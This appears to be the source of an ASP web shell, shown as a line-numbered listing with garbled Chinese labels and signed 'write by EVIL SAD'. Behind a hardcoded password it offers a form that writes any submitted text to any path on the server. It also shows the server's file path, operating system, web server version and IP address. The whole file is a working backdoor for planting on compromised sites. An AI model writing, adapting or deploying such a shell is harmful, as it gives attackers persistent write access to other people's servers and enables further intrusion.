| 1 |
<% |
|---|
| 2 |
on error resume next |
|---|
| 3 |
%> |
|---|
| 4 |
<% |
|---|
| 5 |
if request("pass")="888888" then 'ÔÚÕâÐÞžÄÃÜÂë |
|---|
| 6 |
session("pw")="go" |
|---|
| 7 |
end if |
|---|
| 8 |
%> |
|---|
| 9 |
<%if session("pw")<>"go" then %> |
|---|
| 10 |
<%="<center><br><form action='' method='post'>"%> |
|---|
| 11 |
<%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='ÎÒÒªœøÈ¥'></center>"%> |
|---|
| 12 |
<%else%> |
|---|
| 13 |
<% |
|---|
| 14 |
set fso=server.createobject("scripting.filesystemobject") |
|---|
| 15 |
path=request("path") |
|---|
| 16 |
if path<>"" then |
|---|
| 17 |
data=request("da") |
|---|
| 18 |
set da=fso.createtextfile(path,true) |
|---|
| 19 |
da.write data |
|---|
| 20 |
if err=0 then |
|---|
| 21 |
%> |
|---|
| 22 |
<%="yes"%> |
|---|
| 23 |
<%else%> |
|---|
| 24 |
<%="no"%> |
|---|
| 25 |
<% |
|---|
| 26 |
end if |
|---|
| 27 |
err.clear |
|---|
| 28 |
end if |
|---|
| 29 |
da.close |
|---|
| 30 |
%> |
|---|
| 31 |
<%set da=nothing%> |
|---|
| 32 |
<%set fos=nothing%> |
|---|
| 33 |
<%="<form action='' method=post>"%> |
|---|
| 34 |
<%="<input type=text name=path>"%> |
|---|
| 35 |
<%="<br>"%> |
|---|
| 36 |
<%="µ±Ç°ÎÄŒþ·Ÿ¶:"&server.mappath(request.servervariables("script_name"))%> |
|---|
| 37 |
<%="<br>"%> |
|---|
| 38 |
<%="²Ù×÷ϵͳΪ:"&Request.ServerVariables("OS")%> |
|---|
| 39 |
<%="<br>"%> |
|---|
| 40 |
<%="WEB·þÎñÆ÷°æ±ŸÎª:"&Request.ServerVariables("SERVER_SOFTWARE")%> |
|---|
| 41 |
<%="<br>"%> |
|---|
| 42 |
<%="·þÎñÆ÷µÄIPΪ:"&Request.ServerVariables("LOCAL_ADDR")%> |
|---|
| 43 |
<%="<br>"%> |
|---|
| 44 |
<%=""%> |
|---|
| 45 |
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%> |
|---|
| 46 |
<%="<br>"%> |
|---|
| 47 |
<%="<input type=submit value=save>"%> |
|---|
| 48 |
<%="</form>"%> |
|---|
| 49 |
<%="<font face='ºÚÌå' color='red'> write by EVIL SAD </font>"%> |
|---|
| 50 |
<%="<a href='tencent://message/?uin=44580844'>ÁªÏµÎÒ</a>"%> |
|---|
| 51 |
<%end if%> |
|---|